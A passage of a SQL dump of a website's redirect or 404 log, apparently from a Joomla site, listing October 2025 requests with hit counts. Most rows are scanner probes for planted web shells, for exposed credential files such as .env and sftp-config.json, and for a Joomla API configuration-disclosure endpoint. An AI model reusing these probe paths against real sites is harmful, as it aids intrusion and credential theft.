00:00:00',301),(47593,'http://www.3s-technologies.com.tr/tr/zcanp.php',NULL,'','',1,0,'2025-10-04 21:38:32','0000-00-00 00:00:00',301),(47594,'http://www.3s-technologies.com.tr/tr/burjuva.aspx',NULL,'','',1,0,'2025-10-04 21:38:34','0000-00-00 00:00:00',301),(47595,'http://www.3s-technologies.com.tr/tr/pvt.php',NULL,'','',1,0,'2025-10-04 21:38:36','0000-00-00 00:00:00',301),(47596,'http://www.3s-technologies.com.tr/tr/cgi-bin/wp-2019.php',NULL,'','',1,0,'2025-10-04 21:38:39','0000-00-00 00:00:00',301),(47597,'https://3s-technologies.com.tr/tr/media/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/media/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',2,0,'2025-10-05 10:26:48','0000-00-00 00:00:00',301),(47598,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/k_fl_150x150.png',NULL,'','',1,0,'2025-10-05 10:31:55','0000-00-00 00:00:00',301),(47599,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_ly8c_150x150.jpg',NULL,'','',1,0,'2025-10-05 18:01:05','0000-00-00 00:00:00',301),(47600,'http://3s-technologies.com.tr/tr/api/index.php/v1/config/application?test=1&public',NULL,'','',1,0,'2025-10-05 18:13:13','0000-00-00 00:00:00',301),(47601,'https://3s-technologies.com.tr/tr/images/h0jtq0wdx190/7to2jwaoyiu8mpe6j9baft/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg',NULL,'https://3s-technologies.com.tr/images/h0jtq0wdx190/7tO2jwAoYIU8MPe6J9baFt/a7c02a0850db79ae1c29616c9443197b/webpage_svg.svg','',3,0,'2025-10-05 22:28:28','0000-00-00 00:00:00',301),(47602,'https://www.3s-technologies.com.tr/tr/public/.env',NULL,'https://www.3s-technologies.com.tr/public/.env','',1,0,'2025-10-06 07:39:17','0000-00-00 00:00:00',301),(47603,'http://3s-technologies.com.tr/tr/mpvloi.php',NULL,'','',13,0,'2025-10-06 11:52:56','0000-00-00 00:00:00',301),(47604,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/am100_150x150.jpg',NULL,'','',1,0,'2025-10-06 13:04:33','0000-00-00 00:00:00',301),(47605,'https://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/sftp-config.json',NULL,'https://3s-technologies.com.tr/modules/mod_djimageslider/themes/default/sftp-config.json','',1,0,'2025-10-06 15:41:33','0000-00-00 00:00:00',301),(47606,'https://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/.vscode/sftp.json',NULL,'https://3s-technologies.com.tr/modules/mod_djimageslider/themes/default/.vscode/sftp.json','',1,0,'2025-10-06 15:41:35','0000-00-00 00:00:00',301),(47607,'https://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/.ftpconfig',NULL,'https://3s-technologies.com.tr/modules/mod_djimageslider/themes/default/.ftpconfig','',1,0,'2025-10-06 15:41:36','0000-00-00 00:00:00',301),(47608,'https://3s-technologies.com.tr/tr/modules/mod_djimageslider/themes/default/.remote-sync.json',NULL,'https://3s-technologies.com.tr/modules/mod_djimageslider/themes/default/.remote-sync.json','',1,0,'2025-10-06 15:41:38','0000-00-00 00:00:00',301),(47609,'http://mail.3s-technologies.com.tr/tr/include.php',NULL,'','',3,0,'2025-10-07 15:26:22','0000-00-00 00:00:00',301),(47610,'http://mail.3s-technologies.com.tr/tr/rsjlrria.php',NULL,'','',1,0,'2025-10-07 15:26:23','0000-00-00 00:00:00',301),(47611,'http://mail.3s-technologies.com.tr/tr/xxl.php',NULL,'','',3,0,'2025-10-07 15:26:24','0000-00-00 00:00:00',301),(47612,'http://mail.3s-technologies.com.tr/tr/gelap1.php',NULL,'','',1,0,'2025-10-07 15:26:25','0000-00-00 00:00:00',301),(47613,'http://mail.3s-technologies.com.tr/tr/478.php',NULL,'','',1,0,'2025-10-07 15:26:26','0000-00-00 00:00:00',301),(47614,'http://mail.3s-technologies.com.tr/tr/thxt.php',NULL,'','',9,0,'2025-10-07 15:26:27','0000-00-00 00:00:00',301),(47615,'http://mail.3s-technologies.com.tr/tr/up-up-up.php',NULL,'','',1,0,'2025-10-07 15:26:28','0000-00-00 00:00:00',301),(47616,'http://mail.3s-technologies.com.tr/tr/vubsho.php',NULL,'','',1,0,'2025-10-07 15:26:29','0000-00-00 00:00:00',301),(47617,'http://mail.3s-technologies.com.tr/tr/wgctfd.php',NULL,'','',1,0,'2025-10-07 15:26:31','0000-00-00 00:00:00',301),(47618,'http://mail.3s-technologies.com.tr/tr/xsas.php',NULL,'','',25,0,'2025-10-07 15:26:32','0000-00-00 00:00:00',301),(47619,'http://mail.3s-technologies.com.tr/tr/locale.php',NULL,'','',1,0,'2025-10-07 15:26:33','0000-00-00 00:00:00',301),(47620,'http://mail.3s-technologies.com.tr/tr/faiy.php',NULL,'','',1,0,'2025-10-07 15:26:34','0000-00-00 00:00:00',301),(47621,'http://mail.3s-technologies.com.tr/tr/alfareal.php',NULL,'','',1,0,'2025-10-07 15:26:35','0000-00-00 00:00:00',301),(47622,'http://mail.3s-technologies.com.tr/tr/wpc.php',NULL,'','',4,0,'2025-10-07 15:27:11','0000-00-00 00:00:00',301),(47623,'http://mail.3s-technologies.com.tr/tr/yanz.php',NULL,'','',7,0,'2025-10-07 15:27:20','0000-00-00 00:00:00',301),(47624,'http://mail.3s-technologies.com.tr/tr/admin/upload/css.php',NULL,'','',4,0,'2025-10-07 15:27:22','0000-00-00 00:00:00',301),(47625,'http://mail.3s-technologies.com.tr/tr/f35.php',NULL,'','',80,0,'2025-10-07 15:27:25','0000-00-00 00:00:00',301),(47626,'http://mail.3s-technologies.com.tr/tr/wp-admin/user/about.php',NULL,'','',23,0,'2025-10-07 15:27:29','0000-00-00 00:00:00',301),(47627,'http://mail.3s-technologies.com.tr/tr/index/function.php',NULL,'','',60,0,'2025-10-07 15:27:30','0000-00-00 00:00:00',301),(47628,'http://mail.3s-technologies.com.tr/tr/v.php',NULL,'','',21,0,'2025-10-07 15:27:32','0000-00-00 00:00:00',301),(47629,'http://mail.3s-technologies.com.tr/tr/wp-includes/ixr/admin.php',NULL,'','',4,0,'2025-10-07 15:27:40','0000-00-00 00:00:00',301),(47630,'http://mail.3s-technologies.com.tr/tr/r.php',NULL,'','',12,0,'2025-10-07 15:27:42','0000-00-00 00:00:00',301),(47631,'http://mail.3s-technologies.com.tr/tr/t.php',NULL,'','',41,0,'2025-10-07 15:27:43','0000-00-00 00:00:00',301),(47632,'http://mail.3s-technologies.com.tr/tr/wp-2019.php',NULL,'','',9,0,'2025-10-07 15:27:50','0000-00-00 00:00:00',301),(47633,'http://mail.3s-technologies.com.tr/tr/mail.php',NULL,'','',35,0,'2025-10-07 15:27:55','0000-00-00 00:00:00',301),(47634,'http://mail.3s-technologies.com.tr/tr/d2.php',NULL,'','',6,0,'2025-10-07 15:27:57','0000-00-00 00:00:00',301),(47635,'http://mail.3s-technologies.com.tr/tr/admin/function.php',NULL,'','',44,0,'2025-10-07 15:27:58','0000-00-00 00:00:00',301),(47636,'http://mail.3s-technologies.com.tr/tr/a.php',NULL,'','',41,0,'2025-10-07 15:28:02','0000-00-00 00:00:00',301),(47637,'http://mail.3s-technologies.com.tr/tr/wp-cron.php',NULL,'','',7,0,'2025-10-07 15:28:06','0000-00-00 00:00:00',301),(47638,'http://mail.3s-technologies.com.tr/tr/epinyins.php',NULL,'','',7,0,'2025-10-07 15:28:13','0000-00-00 00:00:00',301),(47639,'http://mail.3s-technologies.com.tr/tr/fileas.php',NULL,'','',16,0,'2025-10-07 15:28:14','0000-00-00 00:00:00',301),(47640,'http://mail.3s-technologies.com.tr/tr/akcc.php',NULL,'','',27,0,'2025-10-07 15:28:15','0000-00-00 00:00:00',301),(47641,'http://mail.3s-technologies.com.tr/tr/a1.php',NULL,'','',41,0,'2025-10-07 15:28:18','0000-00-00 00:00:00',301),(47642,'http://mail.3s-technologies.com.tr/tr/ova.php',NULL,'','',23,0,'2025-10-07 15:28:19','0000-00-00 00:00:00',301),(47643,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/maint.php',NULL,'','',20,0,'2025-10-07 15:28:20','0000-00-00 00:00:00',301),(47644,'http://mail.3s-technologies.com.tr/tr/uwu2.php',NULL,'','',2,0,'2025-10-07 15:28:21','0000-00-00 00:00:00',301),(47645,'http://mail.3s-technologies.com.tr/tr/yellow.php',NULL,'','',21,0,'2025-10-07 15:28:23','0000-00-00 00:00:00',301),(47646,'http://mail.3s-technologies.com.tr/tr/dev.php',NULL,'','',19,0,'2025-10-07 15:28:26','0000-00-00 00:00:00',301),(47647,'http://mail.3s-technologies.com.tr/tr/lite.php',NULL,'','',3,0,'2025-10-07 15:28:31','0000-00-00 00:00:00',301),(47648,'http://mail.3s-technologies.com.tr/tr/plss3.php',NULL,'','',29,0,'2025-10-07 15:28:36','0000-00-00 00:00:00',301),(47649,'http://mail.3s-technologies.com.tr/tr/ton.php',NULL,'','',39,0,'2025-10-07 15:28:37','0000-00-00 00:00:00',301),(47650,'http://mail.3s-technologies.com.tr/tr/ddgg.php',NULL,'','',3,0,'2025-10-07 15:28:39','0000-00-00 00:00:00',301),(47651,'http://mail.3s-technologies.com.tr/tr/aves.php',NULL,'','',7,0,'2025-10-07 15:28:40','0000-00-00 00:00:00',301),(47652,'http://mail.3s-technologies.com.tr/tr/mb.php',NULL,'','',1,0,'2025-10-07 15:28:41','0000-00-00 00:00:00',301),(47653,'http://mail.3s-technologies.com.tr/tr/alma.php',NULL,'','',1,0,'2025-10-07 15:28:43','0000-00-00 00:00:00',301),(47654,'http://mail.3s-technologies.com.tr/tr/he.php',NULL,'','',17,0,'2025-10-07 15:28:44','0000-00-00 00:00:00',301),(47655,'http://mail.3s-technologies.com.tr/tr/sluig.php',NULL,'','',1,0,'2025-10-07 15:28:45','0000-00-00 00:00:00',301),(47656,'http://mail.3s-technologies.com.tr/tr/sjcawlic.php',NULL,'','',1,0,'2025-10-07 15:28:46','0000-00-00 00:00:00',301),(47657,'http://mail.3s-technologies.com.tr/tr/opop.php',NULL,'','',4,0,'2025-10-07 15:28:51','0000-00-00 00:00:00',301),(47658,'http://mail.3s-technologies.com.tr/tr/aa9.php',NULL,'','',1,0,'2025-10-07 15:28:52','0000-00-00 00:00:00',301),(47659,'http://mail.3s-technologies.com.tr/tr/bdr.php',NULL,'','',1,0,'2025-10-07 15:28:53','0000-00-00 00:00:00',301),(47660,'http://mail.3s-technologies.com.tr/tr/azra.php',NULL,'','',1,0,'2025-10-07 15:28:54','0000-00-00 00:00:00',301),(47661,'http://mail.3s-technologies.com.tr/tr/llj.php',NULL,'','',1,0,'2025-10-07 15:28:55','0000-00-00 00:00:00',301),(47662,'http://mail.3s-technologies.com.tr/tr/ron.php',NULL,'','',1,0,'2025-10-07 15:28:56','0000-00-00 00:00:00',301),(47663,'http://mail.3s-technologies.com.tr/tr/gaga.php',NULL,'','',1,0,'2025-10-07 15:28:57','0000-00-00 00:00:00',301),(47664,'http://mail.3s-technologies.com.tr/tr/xsox.php',NULL,'','',8,0,'2025-10-07 15:29:02','0000-00-00 00:00:00',301),(47665,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/mod_ariimageslidersa.xml',NULL,'','',3,0,'2025-10-07 16:04:45','0000-00-00 00:00:00',301),(47666,'https://3s-technologies.com.tr/remote/login?lang=en',NULL,'','',1,0,'2025-10-08 08:53:00','0000-00-00 00:00:00',301),(47667,'https://mail.3s-technologies.com.tr/remote/login?lang=en',NULL,'','',1,0,'2025-10-08 08:53:00','0000-00-00 00:00:00',301),(47668,'http://3s-technologies.com.tr/tr/t3x.php',NULL,'','',6,0,'2025-10-08 15:26:56','0000-00-00 00:00:00',301),(47669,'http://3s-technologies.com.tr/tr/bb5.php',NULL,'','',6,0,'2025-10-08 15:26:58','0000-00-00 00:00:00',301),(47670,'http://3s-technologies.com.tr/tr/lhh2.php',NULL,'','',4,0,'2025-10-08 15:27:05','0000-00-00 00:00:00',301),(47671,'http://3s-technologies.com.tr/tr/alam.php',NULL,'','',7,0,'2025-10-08 15:27:08','0000-00-00 00:00:00',301),(47672,'http://3s-technologies.com.tr/tr/witm.php',NULL,'','',4,0,'2025-10-08 15:27:09','0000-00-00 00:00:00',301),(47673,'http://3s-technologies.com.tr/tr/asserter.php',NULL,'','',4,0,'2025-10-08 15:27:10','0000-00-00 00:00:00',301),(47674,'http://3s-technologies.com.tr/tr/ntgn.php',NULL,'','',4,0,'2025-10-08 15:27:11','0000-00-00 00:00:00',301),(47675,'http://3s-technologies.com.tr/tr/past1.php',NULL,'','',18,0,'2025-10-08 15:27:17','0000-00-00 00:00:00',301),(47676,'http://mail.3s-technologies.com.tr/tr/gelay.php',NULL,'','',8,0,'2025-10-08 22:31:36','0000-00-00 00:00:00',301),(47677,'http://mail.3s-technologies.com.tr/tr/snus.php',NULL,'','',6,0,'2025-10-08 22:31:39','0000-00-00 00:00:00',301),(47678,'http://mail.3s-technologies.com.tr/tr/f6.php',NULL,'','',56,0,'2025-10-08 22:31:41','0000-00-00 00:00:00',301),(47679,'http://mail.3s-technologies.com.tr/tr/nfmr.php',NULL,'','',3,0,'2025-10-08 22:31:42','0000-00-00 00:00:00',301),(47680,'http://mail.3s-technologies.com.tr/tr/gof.php',NULL,'','',3,0,'2025-10-08 22:31:43','0000-00-00 00:00:00',301),(47681,'http://mail.3s-technologies.com.tr/tr/jsp.php',NULL,'','',3,0,'2025-10-08 22:31:45','0000-00-00 00:00:00',301),(47682,'http://mail.3s-technologies.com.tr/tr/alam.php',NULL,'','',3,0,'2025-10-08 22:31:46','0000-00-00 00:00:00',301),(47683,'http://www.3s-technologies.com.tr/tr/shoha.php',NULL,'','',5,0,'2025-10-09 05:44:12','0000-00-00 00:00:00',301),(47684,'http://www.3s-technologies.com.tr/tr/file17.php',NULL,'','',2,0,'2025-10-09 05:44:13','0000-00-00 00:00:00',301),(47685,'http://www.3s-technologies.com.tr/tr/class-t.api.php',NULL,'','',13,0,'2025-10-09 05:44:14','0000-00-00 00:00:00',301),(47686,'http://www.3s-technologies.com.tr/tr/zwso.php',NULL,'','',12,0,'2025-10-09 05:44:15','0000-00-00 00:00:00',301),(47687,'http://www.3s-technologies.com.tr/tr/wp-xrm.php',NULL,'','',1,0,'2025-10-09 05:44:16','0000-00-00 00:00:00',301),(47688,'http://www.3s-technologies.com.tr/tr/nbm.php',NULL,'','',1,0,'2025-10-09 05:44:17','0000-00-00 00:00:00',301),(47689,'http://www.3s-technologies.com.tr/tr/ff.php',NULL,'','',5,0,'2025-10-09 05:44:18','0000-00-00 00:00:00',301),(47690,'http://www.3s-technologies.com.tr/tr/mws.php',NULL,'','',3,0,'2025-10-09 05:44:18','0000-00-00 00:00:00',301),(47691,'http://www.3s-technologies.com.tr/tr/alf4.php',NULL,'','',1,0,'2025-10-09 05:44:19','0000-00-00 00:00:00',301),(47692,'http://www.3s-technologies.com.tr/tr/mtrje.php',NULL,'','',1,0,'2025-10-09 05:44:20','0000-00-00 00:00:00',301),(47693,'http://www.3s-technologies.com.tr/tr/shell1.php',NULL,'','',3,0,'2025-10-09 05:44:20','0000-00-00 00:00:00',301),(47694,'http://www.3s-technologies.com.tr/tr/chn.php',NULL,'','',1,0,'2025-10-09 05:44:21','0000-00-00 00:00:00',301),(47695,'http://www.3s-technologies.com.tr/tr/mnkalo.php',NULL,'','',3,0,'2025-10-09 05:44:22','0000-00-00 00:00:00',301),(47696,'http://www.3s-technologies.com.tr/tr/abt.php',NULL,'','',3,0,'2025-10-09 05:44:23','0000-00-00 00:00:00',301),(47697,'http://www.3s-technologies.com.tr/tr/awi.php',NULL,'','',1,0,'2025-10-09 05:44:23','0000-00-00 00:00:00',301),(47698,'http://www.3s-technologies.com.tr/tr/malo.php',NULL,'','',1,0,'2025-10-09 05:44:24','0000-00-00 00:00:00',301),(47699,'http://www.3s-technologies.com.tr/tr/10266.php',NULL,'','',1,0,'2025-10-09 05:44:25','0000-00-00 00:00:00',301),(47700,'http://www.3s-technologies.com.tr/tr/xpass.php',NULL,'','',1,0,'2025-10-09 05:44:26','0000-00-00 00:00:00',301),(47701,'http://www.3s-technologies.com.tr/tr/hg.php',NULL,'','',1,0,'2025-10-09 05:44:26','0000-00-00 00:00:00',301),(47702,'http://www.3s-technologies.com.tr/tr/async.php',NULL,'','',2,0,'2025-10-09 05:44:27','0000-00-00 00:00:00',301),(47703,'http://www.3s-technologies.com.tr/tr/class.1.php',NULL,'','',2,0,'2025-10-09 05:44:28','0000-00-00 00:00:00',301),(47704,'http://www.3s-technologies.com.tr/tr/gfile1.php',NULL,'','',1,0,'2025-10-09 05:44:28','0000-00-00 00:00:00',301),(47705,'http://www.3s-technologies.com.tr/tr/whv.php',NULL,'','',1,0,'2025-10-09 05:44:29','0000-00-00 00:00:00',301),(47706,'http://www.3s-technologies.com.tr/tr/ioxi-o.php',NULL,'','',25,0,'2025-10-09 05:44:30','0000-00-00 00:00:00',301),(47707,'http://www.3s-technologies.com.tr/tr/volka.php',NULL,'','',1,0,'2025-10-09 05:44:31','0000-00-00 00:00:00',301),(47708,'http://www.3s-technologies.com.tr/tr/codicil.php',NULL,'','',1,0,'2025-10-09 05:44:31','0000-00-00 00:00:00',301),(47709,'http://www.3s-technologies.com.tr/tr/gn.php',NULL,'','',1,0,'2025-10-09 05:44:32','0000-00-00 00:00:00',301),(47710,'http://www.3s-technologies.com.tr/tr/lfm.php',NULL,'','',1,0,'2025-10-09 05:44:33','0000-00-00 00:00:00',301),(47711,'http://www.3s-technologies.com.tr/tr/nxac.php',NULL,'','',1,0,'2025-10-09 05:44:33','0000-00-00 00:00:00',301),(47712,'http://www.3s-technologies.com.tr/tr/ftp.php',NULL,'','',5,0,'2025-10-09 05:44:35','0000-00-00 00:00:00',301),(47713,'http://www.3s-technologies.com.tr/tr/tgrs.php',NULL,'','',3,0,'2025-10-09 05:44:35','0000-00-00 00:00:00',301),(47714,'http://www.3s-technologies.com.tr/tr/wek.php',NULL,'','',1,0,'2025-10-09 05:44:36','0000-00-00 00:00:00',301),(47715,'http://www.3s-technologies.com.tr/tr/c1.php',NULL,'','',2,0,'2025-10-09 05:44:37','0000-00-00 00:00:00',301),(47716,'http://www.3s-technologies.com.tr/tr/auth.php',NULL,'','',4,0,'2025-10-09 05:44:38','0000-00-00 00:00:00',301),(47717,'http://www.3s-technologies.com.tr/tr/ht.php',NULL,'','',2,0,'2025-10-09 05:44:39','0000-00-00 00:00:00',301),(47718,'http://www.3s-technologies.com.tr/tr/st.php',NULL,'','',2,0,'2025-10-09 05:44:40','0000-00-00 00:00:00',301),(47719,'http://www.3s-technologies.com.tr/tr/444.php',NULL,'','',5,0,'2025-10-09 05:44:41','0000-00-00 00:00:00',301),(47720,'http://www.3s-technologies.com.tr/tr/gi.php',NULL,'','',1,0,'2025-10-09 05:44:42','0000-00-00 00:00:00',301),(47721,'http://www.3s-technologies.com.tr/tr/mds.php',NULL,'','',8,0,'2025-10-09 05:44:42','0000-00-00 00:00:00',301),(47722,'http://www.3s-technologies.com.tr/tr/zt2.php',NULL,'','',1,0,'2025-10-09 05:44:43','0000-00-00 00:00:00',301),(47723,'http://www.3s-technologies.com.tr/tr/zzz.php',NULL,'','',1,0,'2025-10-09 05:44:44','0000-00-00 00:00:00',301),(47724,'http://www.3s-technologies.com.tr/tr/nij.php',NULL,'','',3,0,'2025-10-09 05:44:44','0000-00-00 00:00:00',301),(47725,'http://www.3s-technologies.com.tr/tr/sts.php',NULL,'','',2,0,'2025-10-09 05:44:46','0000-00-00 00:00:00',301),(47726,'http://www.3s-technologies.com.tr/tr/uploxe.php',NULL,'','',1,0,'2025-10-09 05:44:47','0000-00-00 00:00:00',301),(47727,'http://www.3s-technologies.com.tr/tr/wp-load.php',NULL,'','',6,0,'2025-10-09 05:44:47','0000-00-00 00:00:00',301),(47728,'http://www.3s-technologies.com.tr/tr/ropyx.php',NULL,'','',1,0,'2025-10-09 05:44:48','0000-00-00 00:00:00',301),(47729,'http://www.3s-technologies.com.tr/tr/class-config.php',NULL,'','',1,0,'2025-10-09 05:44:49','0000-00-00 00:00:00',301),(47730,'http://www.3s-technologies.com.tr/tr/fwe.php',NULL,'','',5,0,'2025-10-09 05:44:50','0000-00-00 00:00:00',301),(47731,'http://www.3s-technologies.com.tr/tr/cs.php',NULL,'','',2,0,'2025-10-09 05:44:51','0000-00-00 00:00:00',301),(47732,'http://www.3s-technologies.com.tr/tr/wo.php',NULL,'','',2,0,'2025-10-09 05:44:53','0000-00-00 00:00:00',301),(47733,'http://www.3s-technologies.com.tr/tr/v4.php',NULL,'','',7,0,'2025-10-09 05:44:54','0000-00-00 00:00:00',301),(47734,'http://www.3s-technologies.com.tr/tr/test2.php',NULL,'','',3,0,'2025-10-09 05:44:55','0000-00-00 00:00:00',301),(47735,'http://www.3s-technologies.com.tr/tr/jf1d22.php',NULL,'','',2,0,'2025-10-09 05:44:55','0000-00-00 00:00:00',301),(47736,'http://www.3s-technologies.com.tr/tr/hn.php',NULL,'','',2,0,'2025-10-09 05:44:57','0000-00-00 00:00:00',301),(47737,'http://www.3s-technologies.com.tr/tr/nl.php',NULL,'','',2,0,'2025-10-09 05:44:58','0000-00-00 00:00:00',301),(47738,'http://www.3s-technologies.com.tr/tr/er8.php',NULL,'','',2,0,'2025-10-09 05:44:58','0000-00-00 00:00:00',301),(47739,'http://www.3s-technologies.com.tr/tr/zc-903.php',NULL,'','',4,0,'2025-10-09 05:44:59','0000-00-00 00:00:00',301),(47740,'http://www.3s-technologies.com.tr/tr/bb2.php',NULL,'','',2,0,'2025-10-09 05:45:00','0000-00-00 00:00:00',301),(47741,'http://www.3s-technologies.com.tr/tr/aipoyp.php',NULL,'','',2,0,'2025-10-09 05:45:02','0000-00-00 00:00:00',301),(47742,'http://www.3s-technologies.com.tr/tr/flower.php',NULL,'','',10,0,'2025-10-09 05:45:02','0000-00-00 00:00:00',301),(47743,'http://www.3s-technologies.com.tr/tr/naxc.php',NULL,'','',3,0,'2025-10-09 05:45:04','0000-00-00 00:00:00',301),(47744,'http://www.3s-technologies.com.tr/tr/555.php',NULL,'','',7,0,'2025-10-09 05:45:05','0000-00-00 00:00:00',301),(47745,'http://www.3s-technologies.com.tr/tr/fmk.php',NULL,'','',2,0,'2025-10-09 05:45:06','0000-00-00 00:00:00',301),(47746,'http://www.3s-technologies.com.tr/tr/zc-749.php',NULL,'','',2,0,'2025-10-09 05:45:08','0000-00-00 00:00:00',301),(47747,'http://www.3s-technologies.com.tr/tr/we2.php',NULL,'','',6,0,'2025-10-09 05:45:08','0000-00-00 00:00:00',301),(47748,'http://www.3s-technologies.com.tr/tr/filesss.php',NULL,'','',6,0,'2025-10-09 05:45:09','0000-00-00 00:00:00',301),(47749,'http://www.3s-technologies.com.tr/tr/asd67.php',NULL,'','',9,0,'2025-10-09 05:45:10','0000-00-00 00:00:00',301),(47750,'http://www.3s-technologies.com.tr/tr/zhidagen.php',NULL,'','',2,0,'2025-10-09 05:45:10','0000-00-00 00:00:00',301),(47751,'http://www.3s-technologies.com.tr/tr/000.php',NULL,'','',7,0,'2025-10-09 05:45:11','0000-00-00 00:00:00',301),(47752,'http://www.3s-technologies.com.tr/tr/okxoby.php',NULL,'','',3,0,'2025-10-09 05:45:12','0000-00-00 00:00:00',301),(47753,'http://www.3s-technologies.com.tr/tr/pass.php',NULL,'','',5,0,'2025-10-09 05:45:13','0000-00-00 00:00:00',301),(47754,'http://www.3s-technologies.com.tr/tr/class17.php',NULL,'','',2,0,'2025-10-09 05:45:14','0000-00-00 00:00:00',301),(47755,'http://www.3s-technologies.com.tr/tr/dfre.php',NULL,'','',2,0,'2025-10-09 05:45:15','0000-00-00 00:00:00',301),(47756,'http://www.3s-technologies.com.tr/tr/nc.php',NULL,'','',4,0,'2025-10-09 05:45:16','0000-00-00 00:00:00',301),(47757,'http://www.3s-technologies.com.tr/tr/file21.php',NULL,'','',10,0,'2025-10-09 05:45:17','0000-00-00 00:00:00',301),(47758,'http://www.3s-technologies.com.tr/tr/axao.php',NULL,'','',4,0,'2025-10-09 05:45:17','0000-00-00 00:00:00',301),(47759,'http://www.3s-technologies.com.tr/tr/okxob.php',NULL,'','',5,0,'2025-10-09 05:45:19','0000-00-00 00:00:00',301),(47760,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/lfs-1-photo_150x150.gif',NULL,'','',1,0,'2025-10-09 05:47:33','0000-00-00 00:00:00',301),(47761,'http://3s-technologies.com.tr/tr/testphpinfo.php',NULL,'','',1,0,'2025-10-09 15:15:08','0000-00-00 00:00:00',301),(47762,'http://3s-technologies.com.tr/tr/smtp.php',NULL,'','',9,0,'2025-10-09 15:15:11','0000-00-00 00:00:00',301),(47763,'http://3s-technologies.com.tr/tr/default.php.bak',NULL,'','',1,0,'2025-10-09 15:15:18','0000-00-00 00:00:00',301),(47764,'http://3s-technologies.com.tr/tr/ms-files.php',NULL,'','',2,0,'2025-10-09 15:15:20','0000-00-00 00:00:00',301),(47765,'http://3s-technologies.com.tr/tr/po-ajax.php',NULL,'','',1,0,'2025-10-09 15:15:21','0000-00-00 00:00:00',301),(47766,'http://3s-technologies.com.tr/tr/shwso.php',NULL,'','',2,0,'2025-10-09 15:15:23','0000-00-00 00:00:00',301),(47767,'http://3s-technologies.com.tr/tr/v22.php',NULL,'','',4,0,'2025-10-09 15:15:25','0000-00-00 00:00:00',301),(47768,'http://3s-technologies.com.tr/tr/gu1ja.php',NULL,'','',1,0,'2025-10-09 15:15:28','0000-00-00 00:00:00',301),(47769,'http://3s-technologies.com.tr/tr/nyntn.php',NULL,'','',1,0,'2025-10-09 15:15:35','0000-00-00 00:00:00',301),(47770,'http://3s-technologies.com.tr/tr/pmxyz.php',NULL,'','',1,0,'2025-10-09 15:15:36','0000-00-00 00:00:00',301),(47771,'http://3s-technologies.com.tr/tr/canonical.php',NULL,'','',1,0,'2025-10-09 15:15:38','0000-00-00 00:00:00',301),(47772,'http://3s-technologies.com.tr/tr/nana.php',NULL,'','',1,0,'2025-10-09 15:15:40','0000-00-00 00:00:00',301),(47773,'http://3s-technologies.com.tr/tr/wp-8irnt.php',NULL,'','',1,0,'2025-10-09 15:15:44','0000-00-00 00:00:00',301),(47774,'http://3s-technologies.com.tr/tr/sitne.php',NULL,'','',1,0,'2025-10-09 15:15:46','0000-00-00 00:00:00',301),(47775,'http://3s-technologies.com.tr/tr/lanxie.php',NULL,'','',1,0,'2025-10-09 15:15:57','0000-00-00 00:00:00',301),(47776,'http://3s-technologies.com.tr/tr/archieving.php',NULL,'','',1,0,'2025-10-09 15:16:01','0000-00-00 00:00:00',301),(47777,'http://3s-technologies.com.tr/tr/upup.php',NULL,'','',1,0,'2025-10-09 15:16:03','0000-00-00 00:00:00',301),(47778,'http://3s-technologies.com.tr/tr/komxzer.php',NULL,'','',1,0,'2025-10-09 15:16:05','0000-00-00 00:00:00',301),(47779,'http://3s-technologies.com.tr/tr/jppy0.php',NULL,'','',1,0,'2025-10-09 15:16:08','0000-00-00 00:00:00',301),(47780,'http://3s-technologies.com.tr/tr/vp.php',NULL,'','',1,0,'2025-10-09 15:16:12','0000-00-00 00:00:00',301),(47781,'http://3s-technologies.com.tr/tr/wp-samp.php',NULL,'','',1,0,'2025-10-09 15:16:13','0000-00-00 00:00:00',301),(47782,'http://3s-technologies.com.tr/tr/contacto.php',NULL,'','',1,0,'2025-10-09 15:16:14','0000-00-00 00:00:00',301),(47783,'http://3s-technologies.com.tr/tr/inat.php',NULL,'','',1,0,'2025-10-09 15:16:15','0000-00-00 00:00:00',301),(47784,'http://3s-technologies.com.tr/tr/alfa2.php',NULL,'','',4,0,'2025-10-09 15:16:16','0000-00-00 00:00:00',301),(47785,'http://3s-technologies.com.tr/tr/d3s.php',NULL,'','',1,0,'2025-10-09 15:16:18','0000-00-00 00:00:00',301),(47786,'http://mail.3s-technologies.com.tr/tr/blex.php',NULL,'','',5,0,'2025-10-09 20:05:29','0000-00-00 00:00:00',301),(47787,'http://mail.3s-technologies.com.tr/tr/class19.php',NULL,'','',39,0,'2025-10-09 20:05:31','0000-00-00 00:00:00',301),(47788,'http://mail.3s-technologies.com.tr/tr/ckk.php',NULL,'','',7,0,'2025-10-09 20:05:38','0000-00-00 00:00:00',301),(47789,'http://mail.3s-technologies.com.tr/tr/wa.php',NULL,'','',7,0,'2025-10-09 20:05:39','0000-00-00 00:00:00',301),(47790,'http://mail.3s-technologies.com.tr/tr/wb.php',NULL,'','',17,0,'2025-10-09 20:05:40','0000-00-00 00:00:00',301),(47791,'http://mail.3s-technologies.com.tr/tr/wc.php',NULL,'','',2,0,'2025-10-09 20:05:41','0000-00-00 00:00:00',301),(47792,'http://mail.3s-technologies.com.tr/tr/wd.php',NULL,'','',2,0,'2025-10-09 20:05:41','0000-00-00 00:00:00',301),(47793,'http://mail.3s-technologies.com.tr/tr/wf.php',NULL,'','',2,0,'2025-10-09 20:05:43','0000-00-00 00:00:00',301),(47794,'http://mail.3s-technologies.com.tr/tr/wg.php',NULL,'','',2,0,'2025-10-09 20:05:44','0000-00-00 00:00:00',301),(47795,'http://mail.3s-technologies.com.tr/tr/wh.php',NULL,'','',2,0,'2025-10-09 20:05:44','0000-00-00 00:00:00',301),(47796,'http://mail.3s-technologies.com.tr/tr/wi.php',NULL,'','',5,0,'2025-10-09 20:05:45','0000-00-00 